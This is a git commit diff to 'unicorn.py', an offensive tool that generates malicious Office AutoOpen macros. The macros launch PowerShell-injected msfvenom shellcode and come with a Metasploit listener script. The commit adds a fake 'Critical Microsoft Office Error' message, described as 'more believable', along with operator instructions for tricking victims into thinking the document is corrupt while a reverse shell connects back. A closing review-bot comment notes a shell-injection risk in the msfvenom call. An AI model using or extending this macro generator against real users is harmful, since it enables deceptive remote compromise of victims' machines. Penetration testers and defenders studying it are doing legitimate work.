Update to version 1.1 better macro support
root committed Apr 22, 2015
1 parent fd8cd18 commit 2e1d8fb
Showing 2 changed files with 102 additions and 45 deletions.
11 changes: 11 additions & 0 deletions CHANGELOG.txt
@@ -1,3 +1,14 @@
~~~~~~~~~~~~~~~~
version 1.1
~~~~~~~~~~~~~~~~

* fixed autoopen from not working on some office implementations - now works on all office documents including powerpoint/word/excel
* changed the open description to fix a typo and also make it more believable
* fixed spacing issues when generating macro attack
* added instructions on when using macro on how to add the macro to an office document
* added better description and instructions for powershell injection
* added better description on initial loading of payload

~~~~~~~~~~~~~~~~
version 1.0
~~~~~~~~~~~~~~~~
136 changes: 91 additions & 45 deletions unicorn.py
Expand Up @@ -19,21 +19,64 @@
import subprocess
import sys

def gen_unicorn():
print r"""
,/
//
,//
___ /| |//
`__/\_ --(/|___/-/
\|\_-\___ __-_`- /-/ \.
|\_-___,-\_____--/_)' ) \
\ -_ / __ \( `( __`\|
`\__| |\)\ ) /(/|
,._____., ',--//-| \ | ' /
/ __. \, / /,---| \ /
/ / _. \ \ `/`_/ _,' | |
| | ( ( \ | ,/\'__/'/ | |
| \ \`--, `_/_------______/ \( )/
| | \ \_. \, \___/\
| | \_ \ \ \
\ \ \_ \ \ / \
\ \ \._ \__ \_| | \
\ \___ \ \ | \
\__ \__ \ \_ | \ |
| \_____ \ ____ | |
| \ \__ ---' .__\ | | |
\ \__ --- / ) | \ /
\ \____/ / ()( \ `---_ /|
\__________/(,--__ \_________. | ./ |
| \ \ `---_\--, \ \_,./ |
| \ \_ ` \ /`---_______-\ \\ /
\ \.___,`| / \ \\ \
\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ ( `_' \ |
\. \ \. \ `__/ | |
\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( __; ( _; ('-_';
|___\ \___: \___:
"""


# split string
def split_str(s, length):
return [s[i:i+length] for i in range(0, len(s), length)]

# generate full macro
def genMacro(full_attack):
#start of the macro
macro_str = """Sub Auto_Open()
macro_str = """Sub AutoOpen()
Dim x
x = """
linelength = 380
powershell_command_list = split_str(full_attack, linelength)

for line in powershell_command_list:
macro_str += "& \"" + line + "\" _\r\n"
macro_str += "& \"" + line + "\" _\n"

# remove trailing "_ \r\n"
macro_str = macro_str[:-4]
Expand All @@ -44,10 +87,10 @@ def genMacro(full_attack):
macro_str += """
Shell ("POWERSHELL.EXE " & x)
Dim title As String
title = "Critical error"
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "An error has occurd while decrypting the file. Excel is unable to continue."
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub
Expand All @@ -56,6 +99,7 @@ def genMacro(full_attack):

# generate base shellcode
def generate_shellcode(payload,ipaddr,port):
print "[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode..."
port = port.replace("LPORT=", "")
proc = subprocess.Popen("msfvenom -p %s LHOST=%s LPORT=%s -a x86 --platform windows -f c" % (payload,ipaddr,port), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
data = proc.communicate()[0]
Expand Down Expand Up @@ -108,8 +152,49 @@ def format_payload(payload, ipaddr, port, macro):
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (payload,ipaddr,port))
filewrite.close()

gen_unicorn()
print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)"
print "Twitter: @TrustedSec, @HackingDave"
print "\nHappy Magic Unicorns."

if len(macro) > 30:
print """
[*******************************************************************************************************]
-----MACRO ATTACK INSTRUCTIONS----
For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you
do that, you will have a developer tab. Create a new macro, call it AutoOpen and paste the generated
code into that. This will automatically run. Note that a message will prompt to the user saying that
the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is
tricking the victim to thinking the excel document is corrupted. You should get a shell through
powershell injection after that.
NOTE: WHEN COPYING AND PASTING THE EXCEL, IF THERE ARE ADDITIONAL SPACES THAT ARE ADDED YOU NEED
TO REMOVE THESE AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE "x" OR A SYNTAX ERROR
WILL HAPPEN!
[*******************************************************************************************************]
"""

print """
[*******************************************************************************************************]
-----POWERSHELL ATTACK INSTRUCTIONS----
Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains
all of the code needed in order to inject the powershell attack into memory. Note you will need a place
that supports remote command injection of some sort. Often times this could be through an excel/word
doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and
scenarios to where you can use this attack at. Simply paste the powershell_attacks.txt command in
any command prompt window or where you have the ability to call the powershell executable and it
will give a shell back to you. Note that you will need to have a listener enabled in order to capture
the attack.
[*******************************************************************************************************]
"""
print "[*] Exported powershell output code to powershell_attack.txt."
print "[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute."
print "[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener."


# pull the variables needed for usage
try:
Expand All @@ -132,46 +217,7 @@ def format_payload(payload, ipaddr, port, macro):

# if we did supply parameters
elif len(sys.argv) < 3:
print r"""
,/
//
,//
___ /| |//
`__/\_ --(/|___/-/
\|\_-\___ __-_`- /-/ \.
|\_-___,-\_____--/_)' ) \
\ -_ / __ \( `( __`\|
`\__| |\)\ ) /(/|
,._____., ',--//-| \ | ' /
/ __. \, / /,---| \ /
/ / _. \ \ `/`_/ _,' | |
| | ( ( \ | ,/\'__/'/ | |
| \ \`--, `_/_------______/ \( )/
| | \ \_. \, \___/\
| | \_ \ \ \
\ \ \_ \ \ / \
\ \ \._ \__ \_| | \
\ \___ \ \ | \
\__ \__ \ \_ | \ |
| \_____ \ ____ | |
| \ \__ ---' .__\ | | |
\ \__ --- / ) | \ /
\ \____/ / ()( \ `---_ /|
\__________/(,--__ \_________. | ./ |
| \ \ `---_\--, \ \_,./ |
| \ \_ ` \ /`---_______-\ \\ /
\ \.___,`| / \ \\ \
\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ ( `_' \ |
\. \ \. \ `__/ | |
\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( __; ( _; ('-_';
|___\ \___: \___:
"""
gen_unicorn()
print "-------------------- Magic Unicorn Attack Vector -----------------------------"
print "\nReal quick down and dirty for native x86 powershell injection on any platform"
print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)"
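Review bot: In `generate_shellcode`, the msfvenom command is still built with `%` formatting and run with `shell=True`, so any shell metacharacter in `payload`, `ipaddr` or `port` is interpreted by the shell. Those values appear to come from the command line, though the argument parsing is outside the visible hunks. Passing an argument list without `shell=True` avoids this: `subprocess.Popen(["msfvenom", "-p", payload, "LHOST=" + ipaddr, "LPORT=" + port, "-a", "x86", "--platform", "windows", "-f", "c"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)`. The call also reads only `communicate()[0]`, so a failed msfvenom run yields empty data and its stderr is dropped; checking `proc.returncode` and printing the captured stderr before continuing would surface that. The function body continues past the end of its hunk, so later handling of `data` is not visible here.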
